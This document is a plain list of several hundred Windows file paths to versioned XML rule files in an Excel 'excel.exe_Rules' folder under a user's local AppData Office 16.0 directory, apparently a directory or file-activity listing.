C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702801v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702800v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703351v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703350v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703501v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703500v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701801v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701800v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701051v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701050v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702751v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702750v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702301v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702300v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703401v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703400v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702501v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702500v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700501v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700500v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702551v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702550v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701351v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701350v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702151v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702150v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703001v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703000v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700751v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700750v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700151v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700150v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703451v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703450v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700901v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700900v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702251v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702250v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702651v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702650v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703101v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703100v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702901v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702900v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703601v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703600v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703851v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703850v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703801v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703800v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703701v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703700v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703751v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703750v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701301v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701300v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule704051v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule704050v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701701v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701700v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702051v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702050v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700701v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700700v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700551v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700550v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703651v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703650v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700601v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700600v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703151v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703150v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703951v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703950v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702851v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702850v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700001v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700000v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701401v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701400v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701951v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701950v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700851v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700850v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701851v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701850v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703051v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703050v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700101v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702101v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702100v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700100v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700951v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700950v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703551v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703550v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700451v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702701v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702700v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700450v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701901v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701900v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule704001v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule704000v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703251v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703250v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702401v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702400v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701551v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701550v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700301v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700300v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702001v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702000v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702601v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702600v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703201v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703200v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700251v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700250v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700651v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700650v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703301v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule703300v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701751v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701750v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701651v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701650v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702451v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule702450v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701101v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule701100v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120128v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120605v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120126v8.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490014v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490009v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490011v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490018v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490020v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68002v11.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68003v12.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68004v16.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68006v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68009v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68010v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68011v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68012v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68013v9.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68014v8.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68015v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68016v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68017v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68019v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68020v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68023v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68024v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68025v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68026v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68027v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68028v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68029v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68031v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68038v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68039v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68040v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68000v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68001v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180003v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180026v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180027v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180028v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180029v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180030v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180031v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180032v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180034v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180043v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180049v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180051v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180052v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180057v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180058v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180059v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180063v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180064v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180065v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180066v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180072v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180077v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180078v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180079v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180080v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180084v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180087v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180136v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180143v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180161v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180162v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180163v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180177v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180195v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule180200v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440000v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440004v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440005v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120120v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120112v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120119v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270000v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270001v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270002v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270003v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270004v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270009v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270010v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270011v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270012v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270013v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270014v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270015v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270016v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270017v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270018v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270019v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule880024v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule880023v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68030v6.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68018v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11930v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11794v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11768v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11767v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11705v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11701v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11265v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10818v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224900v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63077v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63070v5.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63069v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63056v9.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63046v10.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224085v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224086v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224087v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224910v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224068v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224059v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule704101v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule704100v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule704201v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule704200v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule704151v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule704150v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120107v6.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241000v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70502v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule840002v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490028v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490024v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490016v3.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490025v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325000v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule69600v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224008v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224010v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224011v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224012v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224013v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120501v17.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule880019v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule880018v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324001v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324004v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324005v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324006v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324007v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324008v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324009v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324010v2.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68008v4.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule12035v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule12019v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11989v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11981v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11939v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11933v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11932v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11931v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11890v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11882v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11834v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11793v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11792v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11771v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11770v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11769v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11710v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11659v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11514v1.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11504v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11502v0.xml
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11500v0.xml
